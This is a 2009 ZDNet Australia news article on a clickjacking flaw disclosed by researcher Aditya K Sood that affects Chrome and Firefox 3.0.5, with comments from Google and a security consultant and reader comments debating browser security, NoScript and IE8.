madison
Home / News & Blogs

Flaw exposes Chrome, Firefox to clickjacking

Liam Tung ZDNet Australia | January 29, 2009 4:43 AM PST

Summary

Security researchers have discovered a vulnerability that exposes Google's Chrome browser and Firefox 3.0.5 to a clickjacking attack

Topics

Google Inc., Mozilla Firefox, Researcher, Attacker, Flaw, Web Browser, Google Chrome, Attack, Web Browsers, Security, Internet, Chrome, Google, browser, clickjacking, malware, Firefox, Liam Tung ZDNet Australia
Security researchers have discovered a flaw affecting Google's Chrome browser that exposes it to clickjacking — where an attacker hijacks a browser's functions by substituting a legitimate link with a link of the attacker's choice.

Google has acknowledged the flaw and is working towards a patch for Chrome versions 1.0.154.43 and earlier when running within Windows XP SP2 systems, according to SecNiche security researcher Aditya K Sood.

Sood disclosed the flaw on January 27 and has since posted a proof of concept on the Bugtraq vulnerability-disclosure forum. "Attackers can trick users into performing actions which the users never intended to do and there is no way of tracing such actions later, as the user was genuinely authenticated on the other page," Sood said within the disclosure.

While Google is working on a fix, a spokesperson for the Australian arm of the company pointed out that clickjacking affected all browsers, not just Chrome.

"The [clickjacking] issue is tied to the way the web and web pages were designed to work, and there is no simple fix for any particular browser. We are working with other stakeholders to come up with a standardized long-term mitigation approach," they said.

However, chief executive of Australian security consultancy Novologica, Nishad Herath, told ZDNet.com.au that after running Sood's proof of concept he found that Internet Explorer 8 (release candidate 1 and beta 2 versions) and Opera 9.63 (the latest version) were not exposed to the flaw. But, like Chrome, Firefox 3.0.5 was exposed.

Google's security researchers had not found any attacks in the wild that exploited the specific vulnerability, said Google's spokesperson.

Clickjacking is a relatively new type of browser attack. The attack broadly fits within the category of cross-site scripting forgery, where an attacker uses maliciously crafted HTML or JavaScript code to force a victim's web browser to send an HTTP request to a website of their choosing.

"Clickjacking means that any interaction you have with a website you're on, for example like clicking on a link, may not do what you expect it to do," said Herath.

"You may click on a link that looks like it's pointing to a picture on Flickr, but in reality, it might first direct you to a drive-by-download server that serves malware. These types of attacks can be used to make you interact with web services you're already logged on to in ways that you would never want to, without you even knowing that it has happened."

Credit: Chrome, Firefox get clickjacked was originally published on ZDNet Australia.

Talkback Most Recent of 20 Talkback(s)

  • Stonewalling over IE???
    How about the flaw in IE 6? IE 7?? After all, most users would be on one of those...not IE 8. LOVE how the headline leaves IE out and focuses on Chrome and Firefox.
    ZDNet Gravatar
    techboy_z
    29th Jan 2009
  • True but...
    True, but it is a reminder of the effort Microsoft has put into IE to preemptively protect the new browser from this type of exploit.

    It is about time IE hasn't been caught with its pants down.
    ZDNet Gravatar
    mikefarinha
    29th Jan 2009
  • That's besides techboy's point...
    True, but it is a reminder of the effort Microsoft has put into IE to preemptively protect the new browser from this type of exploit.

    Who the hell's running IE8 as opposed to IE6? Your response means nothing.
    ZDNet Gravatar
    hasta la Vista, bah-bie
    30th Jan 2009
  • Nairaine Isn't the Brightest Techie!
    But he knows who pays the bills and adds a sugar to the back pocket payolla at Christmas time! haha

    Apply some semantics, throw in some mis-direction and he keeps a smile on Steve Monkey Boy's face, as he dances! :P
    ZDNet Gravatar
    i2fun@...
    30th Jan 2009
  • Whoa!
    Microsoft actually on top of security issues before everybody else? Wow. It must be cold downstairs.
    ZDNet Gravatar
    bardbard
    29th Jan 2009
  • Firefox + NoScript = No Clickjacking. nt
    nt
    ZDNet Gravatar
    T1Oracle
    29th Jan 2009
  • IE does the same thing...
    Not to mention that the VAST majority of malware is COMPLETELY preventable on Windows and ANY BROWSER if you:

    1. Firewall
    2. Patch
    3. Don't run as Admin all the time

    It's that simple.
    ZDNet Gravatar
    Heatlesssun1
    29th Jan 2009
  • Wrong
    Your advice is out of date. Seriously so. Firewall and patch do nothing to defend against XSS and clickjacking, since the browser is working as intended: it interprets the Javascript/Flash.

    You need additional security tools now. You need at LEAST an anti-spyware utility in addition to your anti-virus, AND for true security, NoScript under Firefox.
    ZDNet Gravatar
    mejohnsn
    29th Jan 2009
  • You are correct however...
    A lot of these attacks are meant deliver a malware payload, so my advice still applies.

    As fro anti-virus software, you really don't need an active virus scanner if you have good habits. I surf all the places I like with IE in Vista and have never been attacked. I do run passive scans weekly to make sure I'm ok. Anti-spyware tools are good to have actively running.

    ZDNet Gravatar
    Heatlesssun1
    29th Jan 2009
  • Javascript is so required for the web
    You can't do much without javascript as most sites use it unless they use flash which gives a horrible startup experience.....
    So why do all these people suggest turning off js? Do they not use the web much?
    ZDNet Gravatar
    tom@...
    30th Jan 2009
  • Not COMPLETELY
    You should patch software so it's up to date, and definitely use a firewall and antivirus. But even if you do this and use a non-admin account, there's still the PEBKAC factor. It comes down to the user(on any OS, any browser). Don't visit shady sites, don't install software from untrusted sources, don't open unsolicited email attachments and don't just click the 'OK' button on any pop-ups you get without understanding what you're doing. Oh, and don't enable auto-run on Windows and don't open USB thumb drives or flash memory cards without scanning with your antivirus app. The list goes on. The firewall+antivirus+patches+no-admin will reduce the likelihood of malware infection by perhaps 40-50%. The rest is up to the user.

    PS: "IE does the same thing"
    No it doesn't. You can disable Javascript for selected sites, or disable it completely and add exceptions. I don't recall if it gives you the option of blocking XSS, which is where the risk really lies.
    That's not the same as what NoScript does. You have to use it to get an idea of how much better it is than the IE way. In addition, NoScript also blocks flash, XSS and iFrames, thus effectively almost eliminating the risk of clickjacking. It is possible to get infected with NoScript, if you disable it or allow untrusted sites to run Javascript. Again, clueless users= biggest malware risk.
    ZDNet Gravatar
    balaknair
    29th Jan 2009
  • NoScript is good...
    but your jibe about "clueless users" is really unfair. In fact, it is that unfairness that is the real obstacle to educating the users how to use great tools like NoScript.

    After all: in its default configuration, it certainly is secure, but it gives little or no guidance for deciding which sites to allow. And since risky technologies like Javascript and Flash are overused and misused by web authors, the poor user is confronted with the responsibility for the decision, but deprived of the information needed to make.

    That is why I say:it is not "clueless users" who are the problem, it is clueless or irresponsible web authors who are the problem.
    ZDNet Gravatar
    mejohnsn
    29th Jan 2009
  • Rampant cluelessness...
    That is why I say:it is not "clueless users" who are the problem, it is clueless or irresponsible web authors who are the problem.

    I'd have to say it's a combination of both clueless users and clueless web authors/admins that likely cause 90% of the problems...

    As a slightly OT aside.. WTF happened to ZDNet's log in mechanism today?
    ZDNet Gravatar
    Wolfie2K3
    30th Jan 2009
  • Not completely again...
    IN 8 you have XSS filtering: http://news.softpedia.com/news/IE8-XSS-Filter-Under-the-Hood-92220.shtml

    Of course there debate on how effective it will be.

    Also, if you turn off scripting altogether, how can a cross site scripting attack do anything?

    And a great IE add on IEPro blocks ads and Flash among a lot of other things: http://www.ie7pro.com/

    And there's this:
    ZDNet Gravatar
    Heatlesssun1
    29th Jan 2009
  • Google owns the web, they'll keep any published exploits unpublished
    don't they just flip a switch over at Google and turn off any webpage/site that is malware, why not their shiny browser happy
    ZDNet Gravatar
    Boot_Agnostic
    29th Jan 2009
View More Comments

Talkback - Tell Us What You Think

Formatting +
BB Codes - Note: HTML is not supported in forums
  • [b] Bold [/b]
  • [i] Italic [/i]
  • [u] Underline [/u]
  • [s] Strikethrough [/s]
  • [q] "Quote" [/q]
  • [ol][*] 1. Ordered List [/ol]
  • [ul][*] · Unordered List [/ul]
  • [pre] Preformat [/pre]
  • [quote] "Blockquote" [/quote]

The best of ZDNet, delivered

ZDNet Newsletters

Get the best of ZDNet delivered straight to your inbox

Facebook Activity